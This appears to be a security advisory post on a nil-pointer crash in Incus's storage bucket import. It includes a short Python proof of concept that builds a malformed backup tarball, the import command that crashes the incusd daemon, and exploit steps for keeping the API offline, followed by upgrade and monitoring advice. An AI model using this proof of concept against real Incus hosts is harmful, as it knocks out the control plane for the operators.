Listen to this Post
The vulnerability stems from a missing nil-pointer check in the storage bucket import logic. An authenticated attacker can supply a crafted backup archive where the `index.yaml` file omits the `config` block. The vulnerable function `CreateBucketFromBackup` in `backend.go` proceeds to execute `srcBackup.Config.Bucket` without verifying that `srcBackup.Config` is not nil. Since the YAML unmarshaler initializes the missing field to a nil pointer, the subsequent dereference triggers a Go runtime panic. This panic halts the `incusd` daemon, resulting in a Denial of Service (DoS). The crash does not affect running workloads but makes the control plane API unavailable. The attack requires an authenticated user with permissions to import storage buckets. A malformed archive with a specially crafted `index.yaml` can force the crash. The issue is present in Incus versions prior to 6.23.0. The vulnerable code path is located in `internal/server/storage/backend.go` at line 7754. The fix requires validating that `srcBackup.Config` is not nil before accessing its members, returning an error instead of panicking.
Platform: Incus Container Manager
Version: Pre-6.23.0
Vulnerability : Unchecked nil pointer
Severity: High
date: 2026-03-26
Prediction: Fixed 2026-03-27 (v6.23.0)
What Undercode Say:
Check if running a vulnerable version
incus version | grep -E "6.[0-9]+.[0-9]+" | grep -v "6.23."
Create malicious bucket backup using Python
cat <<EOF > poc_bucket_nil.py
import tarfile
import io
index_content = b"name: dos-trigger\n"
with tarfile.open("nil_panic.tar.gz", "w:gz") as tar:
info = tarfile.TarInfo(name="backup/index.yaml")
info.size = len(index_content)
tar.addfile(info, io.BytesIO(index_content))
print("[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz")
EOF
python3 poc_bucket_nil.py
Trigger the DoS (requires valid storage pool and bucket permissions)
incus storage bucket import local-pool nil_panic.tar.gz crash-test
Verify the crash using journalctl
journalctl -u incus --since "1 minute ago" | grep -E "panic|nil pointer dereference"
Exploit:
- Generate a tarball containing a single `backup/index.yaml` file with only the `name` field, omitting the `config` block.
- Authenticate to Incus as a user with storage bucket import privileges.
- Execute
incus storage bucket import <pool> <tarball> <bucket-name>.
4. The daemon will panic and terminate.
5. Repeated exploitation keeps the API server offline.
Protection from this CVE
- Upgrade to Incus version 6.23.0 or later, which includes the nil-pointer check.
- If immediate upgrade is not possible, restrict storage bucket import permissions to trusted administrators only.
- Monitor `incusd` logs for unexpected crashes or panics related to bucket import failures.
Impact
Denial of Service (DoS) of the Incus control plane. The API server becomes unavailable, preventing container and virtual machine management. Running workloads remain unaffected. An attacker with low-privileged access can disrupt operations repeatedly. No data leakage or privilege escalation occurs.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
